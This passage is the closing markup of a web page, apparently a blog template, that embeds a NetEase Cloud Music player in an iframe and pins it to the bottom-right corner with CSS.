</script>


    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=22707008&auto=0&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
    

  </div>
</body>

</html>